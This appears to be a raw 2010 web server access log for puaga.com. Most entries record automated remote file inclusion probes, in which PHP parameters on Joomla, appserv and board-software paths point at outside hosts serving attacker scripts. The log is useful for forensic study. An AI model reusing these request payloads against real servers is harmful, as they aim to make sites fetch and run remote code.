165.132.30.11 - - [19/Feb/2010:04:14:34 -0800] "GET /logs/access_100121.log%20%20///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [19/Feb/2010:04:14:40 -0800] "GET /logs/access_100121.log%20%20///administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.131.30.150 - - [19/Feb/2010:04:17:48 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "puaga.com"
77.79.246.80 - - [19/Feb/2010:04:19:28 -0800] "GET /logs/access_100124.log///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:04:19:28 -0800] "GET /logs///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:04:19:28 -0800] "GET //appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:04:19:36 -0800] "GET /logs/access_100114.log///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
202.131.30.150 - - [19/Feb/2010:04:19:49 -0800] "GET /orange_g/forum/viewtopic.php?p=27449 HTTP/1.1" 404 5258 "-" "Yeti/1.0 (NHN Corp.; http://help.naver.com/robots/)" "puaga.com"
69.16.237.166 - - [19/Feb/2010:04:20:28 -0800] "GET /logs/access_100127.log//index.php%253Foption%253Dcom_virtuemart%2526Itemid%253D200%2526page%253Dshop.browse%2526category_id%253D3//components/com_virtuemart/show_images_in_imgtag.php?mosConfig.absolute.path=http://www.universal-fabrications.co.uk/id1.gif??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.222.129.18 - - [19/Feb/2010:04:20:39 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.222.129.18 - - [19/Feb/2010:04:20:40 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.222.129.18 - - [19/Feb/2010:04:20:50 -0800] "GET /logs/access_100131.log/components/com_performs/performs.php?mosConfig_absolute_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:04:21:00 -0800] "GET //appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:04:21:00 -0800] "GET /logs///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:04:21:00 -0800] "GET /logs/access_100124.log///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:04:21:02 -0800] "GET /logs///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:04:21:02 -0800] "GET /logs/access_100124.log///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:04:21:02 -0800] "GET //appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
207.210.125.250 - - [19/Feb/2010:04:21:18 -0800] "GET /administrator/components/com_extcalendar/admin_events.php?CONFIG_EXT[ADMIN_DIR]=http://www.neosemitech.com/board/data/session/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.puaga.com"
207.210.125.250 - - [19/Feb/2010:04:21:18 -0800] "GET /logs//administrator/components/com_extcalendar/admin_events.php?CONFIG_EXT[ADMIN_DIR]=http://www.neosemitech.com/board/data/session/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:04:21:23 -0800] "GET /logs/access_100124.log///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:04:21:23 -0800] "GET /logs///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:04:21:23 -0800] "GET //appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:04:21:27 -0800] "GET /logs/access_100124.log///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:04:21:27 -0800] "GET //appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:04:21:27 -0800] "GET /logs///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [19/Feb/2010:04:21:30 -0800] "GET /logs//include/write.php?dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [19/Feb/2010:04:21:30 -0800] "GET /logs/access_100207.log%20%20//include/write.php?dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
218.55.227.145 - - [19/Feb/2010:04:21:35 -0800] "GET /include/write.php?dir=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:04:21:38 -0800] "GET /logs/access_100114.log///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:04:21:57 -0800] "GET /logs/access_100114.log///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:04:21:59 -0800] "GET /logs/access_100111.log%20%20///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:04:21:59 -0800] "GET /logs///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:04:21:59 -0800] "GET //appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:04:22:03 -0800] "GET /logs///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:04:22:03 -0800] "GET //appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:04:22:03 -0800] "GET /logs/access_100111.log%20%20///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:04:22:08 -0800] "GET //appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:04:22:08 -0800] "GET /logs/access_100111.log%20%20///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:04:22:08 -0800] "GET /logs///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:04:22:26 -0800] "GET /board/bbs/write_update.php////write_comment_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:04:22:26 -0800] "GET /logs//board/bbs/write_update.php////write_comment_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:04:22:28 -0800] "GET /logs/access.log%20%20//board/bbs/write_update.php////write_comment_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:04:22:37 -0800] "GET /logs//board/bbs/write_update.php////write_comment_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:04:22:37 -0800] "GET /board/bbs/write_update.php////write_comment_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:04:22:37 -0800] "GET /logs/access.log%20%20//board/bbs/write_update.php////write_comment_update.php?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:04:22:38 -0800] "GET /logs///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:04:22:38 -0800] "GET //appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:04:22:38 -0800] "GET /logs/access_100111.log%20%20///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:04:22:41 -0800] "GET /logs///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:04:22:41 -0800] "GET /logs/access_100111.log%20%20///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:04:22:41 -0800] "GET //appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:04:22:49 -0800] "GET //appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:04:22:49 -0800] "GET /logs/access_100111.log%20%20///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:04:22:49 -0800] "GET /logs///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [19/Feb/2010:04:23:16 -0800] "GET /logs///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [19/Feb/2010:04:23:16 -0800] "GET //appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [19/Feb/2010:04:23:16 -0800] "GET /logs/access_100124.log///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:04:23:16 -0800] "GET /logs/access_100124.log%20%20///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [19/Feb/2010:04:23:20 -0800] "GET //appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [19/Feb/2010:04:23:20 -0800] "GET /logs/access_100111.log%20%20///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [19/Feb/2010:04:23:20 -0800] "GET /logs///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [19/Feb/2010:04:23:23 -0800] "GET /logs/access_100114.log///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [19/Feb/2010:04:23:25 -0800] "GET //appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [19/Feb/2010:04:23:25 -0800] "GET /logs///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [19/Feb/2010:04:23:25 -0800] "GET /logs/access_100124.log///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [19/Feb/2010:04:23:31 -0800] "GET /logs/access_100114.log///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [19/Feb/2010:04:23:36 -0800] "GET /logs///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [19/Feb/2010:04:23:36 -0800] "GET //appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [19/Feb/2010:04:23:36 -0800] "GET /logs/access_100111.log%20%20///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:04:23:40 -0800] "GET /logs/access_100124.log%20%20///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:04:23:42 -0800] "GET /logs/access_100124.log%20%20///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:04:23:57 -0800] "GET /logs/access_100119.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.screengolf9475.com/bbs/img/id1???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:04:23:57 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.screengolf9475.com/bbs/img/id1???? HTTP/1.1" 200 4947 "-" "Mozilla/5.0" "www.puaga.com"
74.205.120.218 - - [19/Feb/2010:04:23:58 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.screengolf9475.com/bbs/img/id1???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
75.125.186.154 - - [19/Feb/2010:04:24:02 -0800] "GET /logs/access_100124.log%20%20///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
77.79.246.80 - - [19/Feb/2010:04:24:05 -0800] "GET /logs/access_100124.log%20%20///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [19/Feb/2010:04:24:18 -0800] "GET /logs/access_100124.log%20%20///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [19/Feb/2010:04:24:42 -0800] "GET /logs/access_100124.log%20%20///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.222.129.18 - - [19/Feb/2010:04:24:42 -0800] "GET /logs/access_100202.log/components/com_performs/performs.php?mosConfig_absolute_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
208.70.79.113 - - [19/Feb/2010:04:24:59 -0800] "GET /logs/access_100124.log%20%20///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [19/Feb/2010:04:25:16 -0800] "GET /logs/access_100125.log//bbs//write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [19/Feb/2010:04:25:16 -0800] "GET /logs//bbs//write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [19/Feb/2010:04:25:16 -0800] "GET /bbs//write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.222.129.18 - - [19/Feb/2010:04:26:21 -0800] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.222.129.18 - - [19/Feb/2010:04:26:27 -0800] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.222.129.18 - - [19/Feb/2010:04:26:28 -0800] "GET /logs/access_100202.log/components/com_performs/performs.php?mosConfig_absolute_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.150.6.42 - - [19/Feb/2010:04:30:40 -0800] "GET /logs/access_100207.log//bbs//write_update.php?board_skin_path=http://www.howtolisten.kr//bbs/icon/private_name/img00.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
74.86.155.18 - - [19/Feb/2010:04:32:39 -0800] "GET /logs/access_100214.log////skin/ggambo7002_board/comment_modify.php?dir=http://www.hfsb.org/sites/10225/img/.upload/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [19/Feb/2010:04:34:03 -0800] "GET /logs/access_100124.log//components/com_koesubmit/koesubmit.php?moSconfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [19/Feb/2010:04:34:16 -0800] "GET /logs/access_100209.log//components/com_koesubmit/koesubmit.php?moSconfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.149.110.210 - - [19/Feb/2010:04:34:23 -0800] "GET /logs//bbs/delete_comment.php?board_skin_path=http://je0ab.com/morningform/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.149.110.210 - - [19/Feb/2010:04:34:23 -0800] "GET /bbs/delete_comment.php?board_skin_path=http://je0ab.com/morningform/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.149.110.210 - - [19/Feb/2010:04:34:23 -0800] "GET /logs/access_100202.log%20%20//bbs/delete_comment.php?board_skin_path=http://je0ab.com/morningform/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
83.149.110.210 - - [19/Feb/2010:04:34:49 -0800] "GET /logs/access_100206.log%20%20//bbs/delete_comment.php?board_skin_path=http://je0ab.com/morningform/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [19/Feb/2010:04:35:04 -0800] "GET /logs/access_100114.log%20%20///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [19/Feb/2010:04:35:04 -0800] "GET //appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [19/Feb/2010:04:35:04 -0800] "GET /logs///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [19/Feb/2010:04:35:08 -0800] "GET /logs/access_100114.log%20%20///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [19/Feb/2010:04:35:08 -0800] "GET //appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [19/Feb/2010:04:35:08 -0800] "GET /logs///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [19/Feb/2010:04:35:25 -0800] "GET /logs/access_100124.log//components/com_koesubmit/koesubmit.php?moSconfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [19/Feb/2010:04:35:32 -0800] "GET //appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [19/Feb/2010:04:35:32 -0800] "GET /logs///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [19/Feb/2010:04:35:32 -0800] "GET /logs/access_100114.log%20%20///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [19/Feb/2010:04:35:38 -0800] "GET /logs/access_100209.log//components/com_koesubmit/koesubmit.php?moSconfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
38.101.148.126 - - [19/Feb/2010:04:35:45 -0800] "GET /robots.txt HTTP/1.1" 200 36 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
38.101.148.126 - - [19/Feb/2010:04:35:55 -0800] "GET /ideal/forum/viewtopic.php?p=16471 HTTP/1.1" 404 5258 "-" "Mozilla/5.0 (compatible; discobot/1.1; +http://discoveryengine.com/discobot.html)" "puaga.com"
165.132.30.11 - - [19/Feb/2010:04:36:55 -0800] "GET /logs/access_100126.log%20%20///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [19/Feb/2010:04:37:00 -0800] "GET //appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [19/Feb/2010:04:37:00 -0800] "GET /logs///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
211.220.193.170 - - [19/Feb/2010:04:37:00 -0800] "GET /logs/access_100114.log%20%20///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.222.129.18 - - [19/Feb/2010:04:37:35 -0800] "GET /logs/access_100121.log/components/com_performs/performs.php?mosConfig_absolute_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [19/Feb/2010:04:37:49 -0800] "GET /logs/access_100121.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [19/Feb/2010:04:37:49 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [19/Feb/2010:04:37:49 -0800] "GET /administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
165.132.30.11 - - [19/Feb/2010:04:38:18 -0800] "GET /logs/access_100126.log%20%20///appserv//main.php?appserv_root=http://zerozon.co.kr/photos/count/id1.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.222.129.18 - - [19/Feb/2010:04:38:22 -0800] "GET /logs/access_100121.log/components/com_performs/performs.php?mosConfig_absolute_path=http://landfleischerei-zeise.de//administrator/components/com_virtuemart/Oid1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
67.227.136.138 - - [19/Feb/2010:04:38:24 -0800] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://www.hyonsvc.co.kr//bbs//data/mall/1220057392/Administrator/id1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
